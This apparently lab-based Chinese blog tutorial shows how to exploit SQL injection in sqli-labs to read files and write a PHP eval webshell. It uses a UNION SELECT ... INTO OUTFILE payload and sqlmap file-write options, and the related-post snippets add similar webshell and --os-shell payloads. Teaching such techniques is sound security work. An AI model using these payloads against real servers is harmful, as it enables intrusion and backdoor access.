通过sql注入漏洞读写文件获取webshell

最新推荐文章于 2024-07-11 22:08:09 发布
最新推荐文章于 2024-07-11 22:08:09 发布
阅读量4.3k 收藏 20
点赞数 3
分类专栏: 网络安全 文章标签: sql web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43757105/article/details/120798769
版权

目录

一、前提条件

         二、手工方式

           读文件:

           写文件:

         三、Sqlmap方式

          Sqlmap 读取服务器文件

          Sqlmap 写文件到服务器并获取webshell

一、前提条件:

  1. 当前用户具有文件读写权限

  2.  知道读写文件的绝对路径
  3. Mysql.ini设置secure_file_priv为下图所示

二、手工方式

读文件:

 写文件:

  1. 首先发现注入点,可以利用注入手法进行回显
  2. 利用into outfile ‘上传文件路径+文件名’  进行写文件操作,如下所示: 
    http://192.168.132.139/sqli-labs-master/Less-1/?id=2' and 1=2 union select 1,"<?php @eval($_REQUEST[777]);?>",3 into outfile 'C:\\soft\\phpstudy\\WWW\\1.php' --+

  3. 成功上传一句话木马

    4. 用蚁剑连接拿到webshell

三、Sqlmap方式

Sqlmap 读取服务器文件

--file-read参数

Sqlmap 写文件到服务器并获取webshell

–file-write和–file-dest

将已经写好的shell.php  -----/home/kali/Desktop/shell.php

 成功上传:

用蚁剑连接: 

IDebugger_kxk
关注
专栏目录
SQL注入读写文件
m0_56578216的博客
08-24 1893
SQL注入有直接SQL注入,也有文件读写时的注入,后者的主要目的在于获取webshell或盗取重要文件web 应用在服务器上的绝对路径,一般情况下是不知道的。但是系统敏感文件的路径是固定的。secure_file_priv=null,不允许导入导出操作。secure_file_priv=目录名,只允许此目录及子目录下导入导出操作。secure_file_priv= ,不对导入导出操作做限制。
SQLmap注入获取Webshell常见命令
p_utao的博客
01-22 1109
sqlmap获取shell常见命令 –is-dba:判断是否有dba权限 –os-shell获取系统交互命令 –sql-shell获取数据库交互命令 –password:枚举数据库管理系统用户密码哈希值 参考:https://www.cnblogs.com/fzblog/p/13800604.html ...
sql注入写入webshell
qq_39816136的博客
04-18 1874
最近的hvv热度高涨,最近也是接到了许多的面试电话联系。 所有就sql注入出现的次数比较频繁,是初级hvv的重中之重 我感觉十有八九会问到sql注入,这里就解说一下这个sql注入写入webshell
sql注入之getshell方式
最新发布
m0_52484587的博客
07-11 1185
介绍几种利用sql注入获取系统权限的方法,一是利用outfile函数,另外一种是利用--os-shell
SQL注入webshell
huangyongkang666的博客
03-25 2848
SQL注入webshell 1.MySQLshell 写入WebShell的几种方式 1、利用Union select 写入 需要满足的条件 对web目录有写权限 GPC关闭(GPC:是否对单引号转义) 有绝对路径(读文件可以不用,写文件需要) 没有配置secure-file-priv ?id=1 union select '<?php assert($_POST["cmd"]);?>’ into outfile 'D:/WWW/evil.php' ?id=1 union select
利用SQL注入漏洞读写文件,进而提权,远程登陆
W小哥
12-27 1708
一、前提条件 第一步:修改数据库配置文件,允许文件读写 可以通过在my.ini中添加secure_file_priv这一项来许可文件读写。 测试: 二、利用sql注入漏洞读写文件 第一步:打开目标网站 第二步:通过and 1=1、and 1=2 查看是否存在SQL注入漏洞 1=1是永真表达式 而SELECT * FROM news WHERE id = 1 and 1=1只有两个语句SE...
SQL注入写入文件方法(获取webshell
Goodric的博客
04-08 2703
1、当前数据库用户为 root 权限 2、知道当前网站的绝对路径 3、secure_file_priv 的参数必须为空或目录地址 4、PHP的 GPC 为 off状态;(魔术引号,GET,POST,Cookie)
sqlmap常用渗透方法
weixin_30721899的博客
09-05 610
0X001 适用场景 1.获取了Mysql数据库root账号以及密码。 2.可以访问3306端口以及数据库。 0X002 扫描获取root账号的密码 通常有下面一些方法来获取root账号的密码 (1)phpMyAdmin多线程批量破解工具,下载地址:http://www.test404.com/post-546.html http://pan.baidu.com/s/1c1LD6...
演示DVWA靶场实验环境-使用SQL注入漏洞获取Webshell
# 1. 导言 ## 1.1 什么是DVWA(Damn Vulnerable Web Application...SQL注入漏洞是指Web应用对用户输入的信息没有进行充分过滤和验证,导致攻击者可以通过构造特定的SQL查询语句,从而实现对Web应用的数据库进行非授权
利用SQL注入植入 webshell
小白渣的博客
02-27 6388
这里小结一下通过SQL注入写入WebShell的方法。 传统的SQL语句写shell 通过SQL注入select into outfile实现,如: 1' union ...
DVWA之SQL注入
geejkse_seff的博客
07-30 375
DVWA是一款基于PHP和MYSQL开发的web靶场练习平台,集成了常见的web漏洞如。
〖Python 数据库开发实战 - Python与MySQL交互篇②〗- SQL 注入攻击案例
热门推荐
易编橙 · 终身成长社群,相遇已是上上签!
08-22 4万+
上一章节,我们只是简单的了解了 MySQL Connector 的语法,完成了一个简单的案例。Python 语言操作数据库不是到这里就结束了后续还有很多高级的内容等着我们去学习,该章节我们就来学习一下对所有数据库都有效的 "SQL 注入攻击" 。
SQL注入|文件读写操作
向阳-Y.的博客
11-07 363
SQL注入文件读写及导出 load_file(): 读取函数 http://127.0.0.1/sqli-labs-master/Less-2/?id=-1 union select 1,2,load_file('d:/test.txt') into outfile或into dumpfile:导出函数 http://127.0.0.1/sqli-labs-master/Less-2/?id=-1 union select 'this is my test!' into outfile 'd:/test1
其他sql注入写入webshell的方式
faclon666的博客
03-31 412
这时,我们可以通过修改MySQL的log文件获取Webshell。fields terminated by原理为在输出数据的每个字段之间插入webshell内容,所以如果select返回的只有一个字段,则写入的文件不包含webshell内容,例如下面语句。注入原理:利用lines starting by语句进行拼接,拼接后面的webshell内容,lines starting by可以理解成以每行开始的位置添加xx语句。写入的文件中只包含username的值而没有webshell内容。
知识总结 | 注入写webshell
IerkeU的博客
03-25 3553
一、什么是webshell? ​ webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以称为一种网页后门。 ​ 黑客在入侵在一个网站后,通常会将asp或者php后门文件与网站服务器web目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php的后门,得到一个命令执行环境,以达到控制网站服务器的目的。 一句话木马 ​ 在很多渗透测试过程中,渗透测试人员会上传一句话木马到目标服务器目录继而提权获取系统权限,不论asp、php、jsp都是如此 简
SQL注入写入Webshell(Lines terminated by写入)
faclon666的博客
03-31 779
在输出每条记录的结尾或开始处插入webshell内容,所以即使只查询一个字段也可以写入webshell内容。找到物理路径,但是这是个布尔注入,只返回真假。因为是同一网站,尝试使用上篇文章找到的物理路径来写入webshell。1.当mysql注入点为盲注或报错,Union select写入是不能利用的,那么可以通过分隔符写入(SQLMAP的–os-shell命令,所采用的就是这种方式)页面仅显示有无用户,无其他报错信息,初步判断用布尔盲注。(菜鸟一枚,日常记录,写的不对的地方欢迎大家指正)
SQL注入写入webshell的方法(union select写入)
faclon666的博客
03-30 1352
(菜鸟一枚,日常记录,写的不对的地方欢迎大家指正)
SQL注入漏洞上传webshell需求设计
05-25
SQL注入漏洞是指攻击者通过在Web应用程序的输入栏中注入恶意SQL代码,从而绕过应用程序的身份验证和授权机制,进而执行未经授权的操作,比如上传webshell。 为了利用SQL注入漏洞上传webshell,可以通过以下步骤进行...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

IDebugger_kxk

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值